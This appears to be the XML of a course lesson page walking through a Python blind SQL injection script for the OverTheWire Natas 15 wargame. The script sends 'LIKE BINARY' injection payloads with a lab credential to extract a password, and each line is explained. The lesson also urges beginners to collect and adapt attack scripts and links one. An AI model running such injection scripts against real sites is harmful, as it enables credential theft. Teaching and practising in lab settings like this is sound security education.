    <w:p w14:paraId="49BF8D12" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="5493D15E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:bookmarkStart w:id="1" w:name="_heading=h.30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3E83FF5A" wp14:editId="68E80286">
            <wp:extent cx="5337181" cy="2064915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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5337181" cy="2064915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3D738" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="6AF4518A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t>Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8FEF0" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">The color is to help with legibility. Purple is the code, black is the explanation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8914EE" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="37F4BCD6"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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPBasicAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD376E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Imports the HTTP Basic Auth module that allows for easy HTTP authorization when looping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07446110" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="654C5E14" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2191B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tells the script to use these characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49F39A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="62135022"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filtered = ‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6057D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Variable to be used to filter out characters when discovered to exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D5DC9" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="6343A589"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passwd = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532577B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Variable to be used to grab filtered results and print them to the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752D3EF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="6F997840"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lastRenderedPageBreak/>
        <w:t>for char in chars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA715D3"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Data = {'username</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'natas16" and password LIKE BINARY "%' + char + '%" #'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD331E"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r = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>requests.post(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:color w:val="9900FF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://natas15.natas.labs.overthewire.org/index.php?debug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', auth=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPBasicAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EDC4B"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if 'exists' in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A75ED48"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filtered = filtered + char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091CBA4D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E23D8F7" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a for loop that cycles through each character until it finds if it ‘exists’ then this character is filtered out and added to the next loop. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30475007" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="3AD5DD48"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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0,32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996EA99"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for char in filtered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB2C872"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Data = {'username</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0A795"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r = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>requests.post(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:color w:val="9900FF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://natas15.natas.labs.overthewire.org/index.php?debug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', auth=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPBasicAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA0E2B"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if 'exists' in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="112E5806"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passwd = passwd + char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F38DD6"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print(passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95124C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBD95C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="9900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06FE598B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another for loop that sets the range to be a maximum of 32 characters (all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> passwords are 32 characters). It then gathers the data from the previous loop and prints to the screen the passwd when the if ‘exists’ is found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDE909" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA1D94F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t>The passwd is an empty string that keeps looping for the next character, adds it to the passwd function and repeats the process until the full 32-character password is found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A79C6" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE851D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">The screenshot </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>below  is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of the script running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04055765" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="5BF67776" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="27B5BEED" wp14:editId="026A4153">
            <wp:extent cx="4052017" cy="4069938"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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4052017" cy="4069938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951C56F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="710FE573" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>particular task</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> would be in the more advanced Python scripting arena. Don’t focus too much on writing these types of scripts on your own. Instead, focus on how to read the script. Learning Python is a skill that comes with time and practice; however, you can research online to discover many scripts that others have written to complete Blind SQL or any vulnerability for that matter. Saving these scripts and modifying them to meet your needs is usually a first step for beginners. Here is a good example of a python blind SQL Injection Shell using Python: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E25A7A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="4BB5AACC" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00037313">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidR="00714309">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gist.github.com/wcc526/d404c7a95439196756b0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00714309">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136641F5" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FD126B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:bookmarkStart w:id="2" w:name="_heading=h.fntw5bnqdfl6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>In this lesson, we learned how to use Sublime Text and Python to parse information from web applications. In the process, we exploited a file upload service, an SQL injection vulnerability, and a blind SQL injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB8787A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:bookmarkStart w:id="3" w:name="_heading=h.m8pihi48riz6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00520561">
      <w:footerReference w:type="even" r:id="rId54"/>
      <w:footerReference w:type="default" r:id="rId55"/>
      <w:headerReference w:type="first" r:id="rId56"/>
      <w:footerReference w:type="first" r:id="rId57"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="63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BC307" w14:textId="77777777" w:rsidR="00037313" w:rsidRDefault="00037313">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="64D7F9A5" w14:textId="77777777" w:rsidR="00037313" w:rsidRDefault="00037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DB67" w14:textId="616933E1" w:rsidR="00520561" w:rsidRDefault="00714309">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="009A5148">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="6120C5D3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">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5198" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="009A5148">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="0FD5F303" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="17911CFD" wp14:editId="3511CD35">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5581650</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>54610</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="867410" cy="407670"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
          <wp:docPr id="2742" name="image7.png" descr="https://lh4.googleusercontent.com/jc5r0tAfahI12-oPOY9qjcQtnBJFttC9vXuM3CSY4qQww3uoxehkcfhR06YeZrjoE0CFADMKXBHIiBa3udgmqb0k3C6avQG6nr28s6QQK73B1oL9SUNz79O-cbgHLZJMvgLgldtSX2Q"/>
          <wp:cNvGraphicFramePr/>
          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image7.png" descr="https://lh4.googleusercontent.com/jc5r0tAfahI12-oPOY9qjcQtnBJFttC9vXuM3CSY4qQww3uoxehkcfhR06YeZrjoE0CFADMKXBHIiBa3udgmqb0k3C6avQG6nr28s6QQK73B1oL9SUNz79O-cbgHLZJMvgLgldtSX2Q"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="867410" cy="407670"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
